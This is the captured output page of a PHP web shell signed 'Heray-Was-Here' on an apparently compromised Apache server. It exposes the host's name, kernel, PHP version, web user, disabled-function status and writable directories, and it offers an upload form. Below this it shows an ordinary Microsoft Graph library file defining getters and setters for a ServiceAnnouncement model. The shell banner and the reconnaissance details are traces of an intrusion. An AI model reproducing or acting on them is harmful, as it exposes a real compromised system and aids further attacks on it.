Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/erp/htdocs/includes/microsoft/microsoft-graph/src/Model/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/erp/htdocs/includes/microsoft/microsoft-graph/src/Model/ServiceAnnouncement.php
<?php
/**
* Copyright (c) Microsoft Corporation.  All Rights Reserved.  Licensed under the MIT License.  See License in the project root for license information.
* 
* ServiceAnnouncement File
* PHP version 7
*
* @category  Library
* @package   Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license   https://opensource.org/licenses/MIT MIT License
* @link      https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;

/**
* ServiceAnnouncement class
*
* @category  Model
* @package   Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license   https://opensource.org/licenses/MIT MIT License
* @link      https://graph.microsoft.com
*/
class ServiceAnnouncement extends Entity
{

     /**
     * Gets the healthOverviews
    * A collection of service health information for tenant. This property is a contained navigation property, it is nullable and readonly.
     *
     * @return array|null The healthOverviews
     */
    public function getHealthOverviews()
    {
        if (array_key_exists("healthOverviews", $this->_propDict)) {
           return $this->_propDict["healthOverviews"];
        } else {
            return null;
        }
    }

    /**
    * Sets the healthOverviews
    * A collection of service health information for tenant. This property is a contained navigation property, it is nullable and readonly.
    *
    * @param ServiceHealth[] $val The healthOverviews
    *
    * @return ServiceAnnouncement
    */
    public function setHealthOverviews($val)
    {
        $this->_propDict["healthOverviews"] = $val;
        return $this;
    }


     /**
     * Gets the issues
    * A collection of service issues for tenant. This property is a contained navigation property, it is nullable and readonly.
     *
     * @return array|null The issues
     */
    public function getIssues()
    {
        if (array_key_exists("issues", $this->_propDict)) {
           return $this->_propDict["issues"];
        } else {
            return null;
        }
    }

    /**
    * Sets the issues
    * A collection of service issues for tenant. This property is a contained navigation property, it is nullable and readonly.
    *
    * @param ServiceHealthIssue[] $val The issues
    *
    * @return ServiceAnnouncement
    */
    public function setIssues($val)
    {
        $this->_propDict["issues"] = $val;
        return $this;
    }


     /**
     * Gets the messages
    * A collection of service messages for tenant. This property is a contained navigation property, it is nullable and readonly.
     *
     * @return array|null The messages
     */
    public function getMessages()
    {
        if (array_key_exists("messages", $this->_propDict)) {
           return $this->_propDict["messages"];
        } else {
            return null;
        }
    }

    /**
    * Sets the messages
    * A collection of service messages for tenant. This property is a contained navigation property, it is nullable and readonly.
    *
    * @param ServiceUpdateMessage[] $val The messages
    *
    * @return ServiceAnnouncement
    */
    public function setMessages($val)
    {
        $this->_propDict["messages"] = $val;
        return $this;
    }

}

Hry